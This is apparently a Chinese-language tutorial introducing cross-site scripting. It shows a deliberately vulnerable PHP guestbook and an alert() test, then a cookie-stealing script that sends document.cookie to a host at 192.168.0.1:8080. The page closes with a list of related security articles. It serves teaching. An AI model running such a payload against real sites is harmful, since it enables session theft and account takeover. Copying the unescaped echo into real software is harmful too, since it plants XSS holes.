随着互联网流行,以及网站互动性的提高,像论坛、微博还有各种web2.0应用的兴起,很多网站都可以由用户或多或少的参与,可能很多的网站用户注册之后都可以评论、发帖等等。
当然这些都是对正常向的用户来说的,如果是一个攻击者当然不会老老实实的发帖子之类的了。
众所周知,现在看到的网页基本都是用html、javascript、css等技术在浏览器端展示的,所以如果一个黑客输入的不是正常的评论,而是一段html、javascript、css等的浏览器支持的代码会如何呢?
下面来做个实验,这里我找了了一个”小明“同学写的简陋的类似留言板的php程序,功能就是简单的把用户提交的东西 再显示回去。
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>测试页面</title> </head> <body> <?php if(empty($_REQUEST["T1"]) === false) { echo "用户留言:".$_REQUEST["T1"]; } ?> <form method="POST" action=""> <p>留言:<br/> <textarea class="area-text" style="width: 708px; height: 75px; overflow: hidden;" name="T1"></textarea></p> <p><input type="submit" value="提交"></p> </form> </body> </html>
打开后样子如下:
输入一个你好,上面的用户留言里会显示一个你好,下面来输入一点好玩的:
于是当点击提交之后:
难道这里不应该是在用户留言里显示那句js代码么,让我们来看看页面的html代码在前后两次提交后有什么区别。
第一次:
很正常第二次:
注意刚才提交的<script>alert("This is a xsscode")</script>直接就成为web页面代码的一部分。
在这里让我们来回顾下我们的留言板代码,处理用户提交内容的那部分
<?php if(empty($_REQUEST["T1"]) === false) { echo "用户留言:".$_REQUEST["T1"]; } ?>
首先做了一个判断,检查参数T1是不是为空,之后不为空就执行下面的回显语句,在”用户留言:“后面拼接了T1参数中的内容,再回显到页面上。
可以看到这里,这个粗心的”小明“同学没有对T1的内容做任何检查,就返回给了用户,尼玛起码也得过滤个敏感词啊,网站上面冒个xx功出来要被查水表的。
于是我们就接触到了第一个xss漏洞,也就是跨站脚本,英文Cross-Site Script,这里缩写为了和常见的css(层叠样式表)区分就使用了xss。
xss漏洞很常见,程序员粗心对传入的参数没有检查,或者检查了、处理了,但是狡猾的黑客通过种种手段绕过去了都会造成xss漏洞。
与其他一些漏洞不太相同的是,受到xss漏洞直接攻击的是浏览器端,也就是当一个黑客发起攻击后,实际执行攻击代码的是浏览网站的用户所使用的浏览器,在这个过程中网站的服务器只是起到了一个”帮凶“的作用。
那么这种漏洞有什么危害呢(小明:人也就是弹个框有什么大不了的?)
现在转换一下场景,小明的boss又让小明写了一个论坛程序,各种努力认真,最后搞出了一个炫酷的论坛,用户很多发帖踊跃,boss十分happy。但是他仍然没注意xss漏洞的问题。
让我们用事实来教育小明
我构造了这么一个帖子,标题就叫hello,内容是这样的:
helloworld <script type=text/javascript>window.location = "http://192.168.0.1:8080/cookie.php?cookie="+document.cookie</script>
让我们发出去,等等看别人点开之后会发生什么
(演示向的程序,我太懒就不整到数据库里存了,脑补下小明点链接的动作就好):
这是什么,小明同学的cookie啊,用户名和密码都大喇喇的写在那里,而且还暴露了小明同学暗恋刘你妹的事情。
让我们来看看这个过程中发生了什么,首先咱们肯定是那个js代码搞的鬼,一共有三个部分
第一,document.cookie,这里获取了来看贴子人的cookie;
第二, "http://192.168.0.1:8080/cookie.php?cookie="+document. cookie 这部将获取到的cookie拼到了那个网址里的一个名为“cookie”的字段里;
第三,调用window.location将用户的浏览器指向了这个网址所以最后达到的效果是:把用户的cookie提交给了http://192.168.0.1:8080/coo kie.php 这个网页。
这个网页干了什么呢,很简单的将cookie字段取出然后回显出来。
当然回显出来并不严重,但是如果他是悄悄的存起来了呢?
如果黑客再高级一点,修改一下那个发出去的js代码,利用创建一个图片,将图片地址拼合cookie字段值指向那个cookie.php,然后在cookie.php那里保存并返回一个正常的图片。
oh,no,terrible.
黑客拿到小明的cookie之后,填到他的浏览器里,就能利用小明的身份在论坛上为所欲为了。
看,xss漏洞有多可怕。
======================
可能有人会觉得:“光拿个Cookie弱~爆~了~,老纸的论坛账户没什么用,能奈我何”,可是如果你的浏览器有漏洞,而黑客发了帖子利用xss漏洞扔了段触发漏洞的js,给你按个偷游戏币、网银木马,就真的不好玩了。
而且可怕的是,你明明上的光明正大的论坛,甚至看的是党史党章三观正确无比的帖子,有漏洞的话都会悄无声息的中招。
相关推荐
007-Web安全基础3 - XSS漏洞
tsrc线上培训 第五第六式web安全之xss漏洞、命令执行漏洞专题
web安全之XSS攻击及防御,
WEB安全漏洞 1 1. SQL注入漏洞 4 漏洞描述 4 漏洞危害 4 解决方案 4 代码示例 4 2. 跨站脚本(XSS)漏洞 6 漏洞描述 6 漏洞危害 6 解决方案 7 代码示例 7 3. HTTP header注入漏洞 8 漏洞描述 8 修复建议 8 4. 目录...
XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin...
XSS安全隐患产生原因 1 XSS安全隐患 目录 2 XSS安全隐患产生原因 XSS安全隐患 1、网络钓鱼,包括盗取各类用户账号; 2、窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作; 3、劫持...
WEB开发中常见安全漏洞分析与预防策略
这是大三时软件测试课程的结课论文,论文题目是:《关于Web应用安全中XSS漏洞测试方法的研究》。
特点是非持久化,也不存入网站服务器中,web后端漏洞。 反射型XSS简介 1.反射型XSS的缺点 必须用户点击带有特定恶意脚本代码参数的链接才能执行 恶意代码存放在url中,只有用户在点击恶意链接的时候才会执行恶意代码...
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
“XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading ...恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。”
网络安全学习笔记包含sql注入,ssh暴力破解,web漏洞扫描,xss扩展攻击,文件上传攻击等
Web安全测试之XSS XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者...
全称(CrossSiteScripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.比如获取用户的...
WEB 漏洞-XSS 跨站之 WAF 绕过及安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
Web 应用安全漏洞原理及测试技术1 SQL注入漏洞 任意文件上传漏洞 任意文件下载漏洞 文件包含漏洞 XSS跨站脚本漏洞 CSRF跨站请求伪造漏洞 逻辑漏洞
保存型XSS漏洞---------问题代码--保存型XSS漏洞 本站点请求漏洞--------问题代码--本站点请求漏洞 反射型XSS漏洞---------问题代码--反射型XSS漏洞 跨站点请求漏洞--------问题代码--跨站点请求漏洞 重定向漏洞----...
XSS相关漏洞一直是无法忽略的问题,即使再好的开发工程师也避免不了写出”不安全”的代码,这次议题将深入浅出的介绍一下XSS漏洞形成与危害。